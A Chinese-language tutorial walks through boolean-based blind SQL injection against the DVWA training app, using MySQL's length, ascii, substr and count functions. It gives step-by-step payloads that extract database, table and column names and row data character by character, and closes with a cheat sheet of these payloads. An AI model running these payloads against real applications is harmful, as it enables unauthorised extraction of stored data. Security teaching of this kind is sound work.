网络安全:sql注入基础——盲注

 

上篇文章介绍了sql注入的简单原理。

 

通过发送一些符合语法的输入,执行特定的sql语句,将查询结果返回到页面。这种查询结果在页面显示的方式,我们称为“回显”。

 

举个实际的例子,如一登录窗口,输入用户名和密码,成功登录后。一般会在页面上显示“欢迎你,XXX”之类的话语,这个XXX就是你的用户名。而这个XXX也将作为我们注入回显的通道,通过XXX一点点抠出来我们上一篇中说道的数据。

 

还有一种情况,就是没有回显!你登录成功了,不会显示和查询相关的数据。比如,输入用户名密码,登录成功。界面只有一句“登录成功!”,别无它话。换而言之,我们查询的结果不会在页面上显示一丝一毫,咋办?

 

这种没有回显的注入,我们就称为盲注。也就是看不到查询结果的注入。

 

盲注的精髓就是一个字——猜!

 

虽然sql的查询结果不会显示,但是我们可以判断sql语句是否执行了。例,一个表中只有一个字段id,sql语句为select admin from table;,因为表中没有admin这个字段,sql语句执行错误,向页面返回错误。我们就可以根据页面是否报错,来判断我们输入的sql是否正确,如果页面没有报错,正常返回了。那我们就已经猜出来了这个表里有一个字段名字叫做admin。

 

如果按照上面那个登陆的例子,我们可以通过页面显示的登录成功或失败来判断输入的sql是否正确。

 

仍旧以DVWA作为讲解实例:

网络安全:sql注入基础——盲注

 

输入1:

网络安全:sql注入基础——盲注

输入10:

网络安全:sql注入基础——盲注

 

当sql语句正确执行时,页面返回exists。没有正确执行时,返回MISSING。至于sql语句的查询结果,网页上一点显示都没有,即无回显的注入,又叫盲注。

 

换而言之,我们输入的注入语句是否正确运行了,可以通过页面显示exists还是missing来判断。通过此判断,来猜出数据。

 

这里先放下不谈,我们调出mysql命令行测试几个函数。

 

一、length函数,估计不用说都知道它的作用了,返回参数的长度。例:

                                     网络安全:sql注入基础——盲注

上篇中我们说到了database函数,返回当前的数据库名字。图例为dvwa,因此length为4。

 

在黑盒测试且无回显的状态下,我们能否用length来尝试猜测数据库名字的长度呢?

 

注入:1' and length(database()) > 1#

                    网络安全:sql注入基础——盲注

显示exists,即sql语句成功执行了。我们知道and前后逻辑都为true结果才为true,因此length(database())大于一的判断是正确的。

 

接下来呢?

 

那就大于2试试呗,你会发现也是对的。直到你判断length大于4:

网络安全:sql注入基础——盲注

返回了missing。如果你不确定,你可以看下等于4是否正确,从而消除顾虑。

 

致此,我们通过盲注猜出了数据库名字的长度为4。

 

那怎样猜出数据库的名字呢?

 

先让它待会,我们再来看两个函数ascii和substr:

                                                   网络安全:sql注入基础——盲注

对于ascii函数,它返回参数字符的ascii码值,如果参数长度大于1,那就返回第一个字符的码值。

                                                网络安全:sql注入基础——盲注

对于substr函数,估计也都猜到了,取子串。substr可以有三个参数,第一个是待切割字符串,第二个参数为切割起始位置,字符串第一个字符的下标是1(而不是我们习惯的0),第二个参数是切割长度。

 

现在你有没有猜数据库名字的思路了呢?

 

用substr把字符一个个拿出来,判断它的ascii值就可以了!

 

例如,对此例而言我们知道数据库名为dvwa,对于猜测第一个字符d的注入:1' and ascii(substr(database(), 1, 1)) > 97#

网络安全:sql注入基础——盲注

 

返回exists,说明第一个字符的ascii大于97,我们知道ascii为97的字符是‘a’,也就知道了正确的字符处在a后面。之后我们判断是否大于98,99(当然这里每次累增的增量不一定是1)......

 

直到判断是否大于100:

网络安全:sql注入基础——盲注

missing了,同样的,如果觉得不放心,可以尝试等于100是否正确。

 

通过这种方法,我们就得到了数据库名字的第一个字符是‘d’。对于第二个字符无非就是substr( database(), 2, 1),再来一遍罢了。

 

一翻秀翻周围人,自己却很无聊的操作之后。你就拿到了数据库的名字“dvwa”。

 

剩下的,就是从数据库里掏数据了。问题来了,数据库里的表有几个呢?

 

再来看一个函数,count:

网络安全:sql注入基础——盲注

users表中有五条数据,可以用count计数得出。

 

上篇文章中,我们知道了information_schema.tables表中,放了数据库中所有表的信息。那我们完全可以用count得出tables表中table_schema字段是‘dvwa’的结果有几条:

 

注入:1' and (select count(table_name) from information_schema.tables where table_schema="dvwa") > 1#

 

返回exests,然后判断大于2。

 

当判断到大于2时,发现出错,则判定dvwa数据库中有两个表。

 

我们真实的看下:

网络安全:sql注入基础——盲注

的确有两个表,第一个表叫做guestbook,第二个表叫users。

 

通过盲注,我们现在只得到了,dvwa中有两个表。接下来呢,就来猜表的名字是什么。先来猜第一个表的名字,首先思考这个语句的返回结果:

 

select table_name from information_schema.tables where table_schema='dvwa';

 

应该不用太多的考虑,就是返回dvwa中两个表的名字嘛:

网络安全:sql注入基础——盲注

 

前面我们判断dvwa用的什么方法?ascii,对,继续用呀。

 

这里有个问题我们猜字符的sql语句是select ascii(substr(database(), 1, 1)) > 97,这里需要做的就是把database换成表的名字罢了。

 

然而表的名字有两个,怎样留下一个嘞?用limit。

 

例:

网络安全:sql注入基础——盲注

limit后如果有一个参数,结果返回指定条数的结果。如果有两个参数,第一个参数为起始条数(这里的下标以0为始,和substr的1不同),第二个参数为显示的总条数。

 

我们知道了有两个表,需要一个个判断表的长度和名字,就可以用limit来取出其一进行判断。

 

注入:1' and ascii(substr((select table_name from information_schema.tables where table_schema="dvwa" limit 0,1), 1, 1)) > 97#

 

判断第一个表(也就是guestbook)的名字。当然,这之前,你应该判断下这个表名字的长度,以方便你一个个字符来猜表名。

 

dvwa中第一个表长度猜测注入:1' and length((select table_name from information_schema.tables where table_schema="dvwa" limit 0,1)) > 1#

 

直到你一点点猜出表的名字是guestbook,now你就可以再通过columns表中得到guestbook的字段信息。方法是如初的一致,我就不多BB了。前面理解了,这里就莫得问题了。

 

判断这个表的字段数有多少:

1' and (select count(column_name) from information_schema.columns where table_name="guestbook") >1 #

 

测试结果为两个字段。

 

判断这个表的第一个字段的第一个字符名字:

1' and ascii(substr((select column_name from information_schema.columns where table_name="guestbook" limit 0,1), 1, 1)) > 97#

 

得结果‘c’。然后拿出第二个字符,一直拿出所有字符。(当然这之前你应该先判定字段名有多长,从而知道应该取出几次字符。)最终得第一个字段的名字是comment_id。

 

拿出表中第一条数据的comment_id字段内容:

 

首先判断长度:

1' and length((select comment_id from guestbook limit 0,1)) >1#

 

然后再一个个判断字符,从而得到名字:

1' and ascii(substr((select comment_id from guestbook limit 0,1), 1,1)) >97#

 

经过一番累死人的操作,到这里你就通过盲注得到了一个数据。能明显的感觉到,这比有回显的效率可低太多了。

 

完。

 

后记:

mysql盲注总结:

 

判断数据库长度:
1' and length(database()) > 1#
判断第一个字符:
1' and ascii(substr(database(), 1, 1)) > 97#
判断此数据库中表的数量:
1' and (select count(table_name) from information_schema.tables where table_schema="dvwa") > 3#
判断库中第一个表的长度:
1' and length((select table_name from information_schema.tables where table_schema="dvwa" limit 0,1)) > 1#
判断第一个表的名字:
1' and ascii(substr((select table_name from information_schema.tables where table_schema="dvwa" limit 0,1), 1, 1)) > 97#
判段第一个表的字段数量:
1' and (select count(column_name) from information_schema.columns where table_name="guestbook") >1 #
判断这个表的第一个字段名字:
1' and ascii(substr((select column_name from information_schema.columns where table_name="guestbook" limit 0,1), 1, 1)) > 97#
判断第一条数据的字段内容长度:
1' and length((select comment_id from guestbook limit 0,1)) >1#
判断第一条数据的字段内容:
1' and ascii(substr((select comment_id from guestbook limit 0,1), 1,1)) >97#

上一篇:Vue中添加进度条效果(使用nprogress)


下一篇:数据级并行技术